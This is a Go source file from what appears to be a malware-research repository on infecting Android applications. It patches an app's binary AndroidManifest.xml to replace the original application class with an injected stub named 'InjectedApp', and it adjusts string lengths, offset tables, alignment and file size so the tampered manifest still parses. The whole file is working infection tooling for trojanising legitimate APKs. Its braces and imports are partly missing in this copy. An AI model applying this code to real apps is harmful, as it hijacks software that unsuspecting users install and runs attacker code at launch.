VXUG-Papers/Infecting Android Applications The New Way/master/manifest/patcher.go
2020-10-11 00:40:44 -05:00

301 lines
7.9 KiB

package manifest
import (
const (
fileLenOffset = 0x4
offsetTableOffset = 0x24
offsetStringTableLen = 0xc
stringTableInfoSizeOffset = 0x1c
// Name of application in our stub dex
// It is MUST be longer than any average name
newAppNameUTF8 = "aaaaaaaa.aaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa.InjectedApp"
newAppNameUTF8Len = uint8(len(newAppNameUTF8))
var alignCount uint32
var oldAppNameUTF16 string
var newAppNameUTF16 string
var OldAppNameUTF8 string
var PlainPath, _ = filepath.Abs("AndroidManifest_plaintext.xml")
func patchApplication() ([]byte, int) {
log.Printf("Getting original application name...")
OldAppNameUTF8 = getAppName()
log.Printf("Original applciation name = %s\n", OldAppNameUTF8)
if OldAppNameUTF8 == "" {
log.Panic("Application name wasn't found")
//TODO if not found - we should add our
// read bytes from binary xml
androidManifestRaw, err := ioutil.ReadFile(common.ManifestBinaryPath)
if err != nil {
log.Panicf("Failed to read %s", common.ManifestBinaryPath)
log.Printf("Original manifest (binary) size = 0x%0x\n", len(androidManifestRaw))
// encode name to UTF-16
encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder()
oldAppNameUTF16, err = encoder.String(OldAppNameUTF8)
// searching application name position in binary manifest
pos := bytes.Index(androidManifestRaw, []byte(oldAppNameUTF16))
//get lenght of string
originalLen := int(androidManifestRaw[pos-2]) * 2
log.Printf("pos = 0x%0x, original applciation name length = 0x%0x\n", pos, originalLen)
//patch length with new value. length = characters count
// pos-2 - because every string is followed by len
androidManifestRaw[pos-2] = newAppNameUTF8Len
//patch application name with new name
// do not forget about alignment!
newAppNameUTF16, err = encoder.String(newAppNameUTF8)
newAppNameUTF16Len := len(newAppNameUTF16)
// how many bytes we add to manifest
lenDiff := newAppNameUTF16Len - originalLen
//// we need enough space to insert our name
androidManifestRawNew := make([]byte, len(androidManifestRaw)+newAppNameUTF16Len-originalLen)
log.Printf("new applciation name = %s, new application length = 0x%0x\n",
newAppNameUTF8, newAppNameUTF16Len)
// copy everything until application name string
copy(androidManifestRawNew, androidManifestRaw[:pos])
// copy our name
copy(androidManifestRawNew[pos:], []byte(newAppNameUTF16))
// copy everything after name
copy(androidManifestRawNew[pos+len([]byte(newAppNameUTF16)):], androidManifestRaw[pos+originalLen:])
// calc position where we should insert alignment bytes
alignPos := (newAppNameUTF16Len - originalLen) + StringTableEndPos
log.Printf("alignPos = 0x%0x\n", alignPos)
// how many bytes we should insert?
// The main idea - data after string table should be
// aligned to 4 bytes
alignCount = uint32(alignPos % 4)
log.Printf("align = %d\n", alignCount)
if alignCount != 0 {
var alignSlice = make([]byte, alignCount)
// insert byte alignment
androidManifestRawNew = append(androidManifestRawNew[:alignPos], append(alignSlice, androidManifestRawNew[alignPos:]...)...)
return androidManifestRawNew, lenDiff
// we should find from what offset in StringOffsets
// we should start changing offsets by incrementing them to
// number of characters application name expanded
// manifest_strings.dmp contains all strings
// we should count strings after application name
// it will be position of offset
func getAppNameOffset() uint32 {
// position in string offset
//var appNameOff uint32 = 1
var pos uint32
data, err := ioutil.ReadFile(ManifestStringsDmp)
if err != nil {
// searching application name position in string dump
// we substract 2 because real offset is the offset to strLen + str
// but we found offset to just str
pos = uint32(bytes.Index(data, []byte(oldAppNameUTF16)) - 2)
log.Printf("application name position in string dump = 0x%x", pos)
return pos
func patchOffsetTable(data []byte, appNameOff, lenDiff uint32) {
var offset uint32
offsetTableReader := bytes.NewReader(data)
var j uint32 = 0
for i := uint32(1); i <= StringCnt - appNameOff; i++ {
//read offset
err := binary.Read(offsetTableReader, binary.LittleEndian, &offset)
if err != nil {
log.Panic("Failed to read offset", err)
log.Printf("Original offset = 0x%x", offset)
//increment it to length of symbol added
offset += lenDiff
log.Printf("New offset = 0x%x", offset)
binary.LittleEndian.PutUint32(data[j:], offset)
j += 4
func patchStringTableLen(data []byte) {
var stringTableLen uint32
stringTableLenReader := bytes.NewReader(data)
err := binary.Read(stringTableLenReader, binary.LittleEndian, &stringTableLen)
if err != nil {
log.Panic("Failed to read offset", err)
// calc how many bytes we added to manifest
// it's a difference between new name and old name
// *2 - because they are in UTF-16
// IMPORTANT! stringTableLen - must be 4 byte aligned
newLen := len(newAppNameUTF16)
oldLen := len(oldAppNameUTF16)
stringTableLenNew := uint32(int(stringTableLen) + newLen - oldLen)
// align
stringTableLenNew += alignCount
binary.LittleEndian.PutUint32(data, stringTableLenNew)
func Patch() {
var androidManifestRaw, lenDiff = patchApplication()
log.Printf("New manifest len = 0x%0x\n", len(androidManifestRaw))
// after we insert new application name we need to increase length of manifest len
binary.LittleEndian.PutUint32(androidManifestRaw[fileLenOffset:], uint32(len(androidManifestRaw)))
var appNameOff = getAppNameOffset()
// search offset in manifest
appNameOffArr := make([]byte, 4)
binary.LittleEndian.PutUint32(appNameOffArr, appNameOff)
pos := uint32(bytes.Index(androidManifestRaw, appNameOffArr))
log.Printf("application name offset in manifest = 0x%x", pos)
// we step to next offset after our found app name offset
pos += 4
// locate the end of stringTableOffset (equals to the start of strings)
var stringTableInfoSize uint32
var stringOffsetTableEnd uint32
stringTableInfoSizeReader := bytes.NewReader(androidManifestRaw[stringTableInfoSizeOffset:])
err := binary.Read(stringTableInfoSizeReader, binary.LittleEndian, &stringTableInfoSize)
if err != nil {
log.Panic("Failed to read offset", err)
log.Printf("stringTableInfoSize = 0x%x", stringTableInfoSize)
// 0x8 - start of StringTableInfo section
stringOffsetTableEnd = 0x8 + stringTableInfoSize
log.Printf("stringOffsetTableEnd = 0x%x", stringOffsetTableEnd)
//start reading & patching
offsetTableReader := bytes.NewReader(androidManifestRaw[pos:])
var j = pos
var offset uint32
for i := pos; i < stringOffsetTableEnd; {
//read offset
err := binary.Read(offsetTableReader, binary.LittleEndian, &offset)
if err != nil {
log.Panic("Failed to read offset", err)
//log.Printf("Original offset = 0x%x", offset)
//increment it to length of symbol added
offset += uint32(lenDiff)
//log.Printf("New offset = 0x%x", offset)
//patch with new value
binary.LittleEndian.PutUint32(androidManifestRaw[j:], offset)
j += 4
i += 4
common.WriteChanges(androidManifestRaw, common.ManifestBinaryPath)
// Search application name in decoded android manifest
func getAppName() string {
// read manifest to byte array
content, err := ioutil.ReadFile(PlainPath)
if err != nil {
//defer func() {
// err = os.Remove(manifestPlainPath)
// if err != nil {
// panic(err)
// }
//} ()
// structs for XML nodes
type Application struct {
Name string `xml:"name,attr"`
type Result struct {
XMLName xml.Name `xml:"manifest"`
Application Application `xml:"application"`
v := new(Result)
err = xml.Unmarshal(content, v)
if err != nil {
log.Panic("Failed to unmarshal XML", err)
return ""
return v.Application.Name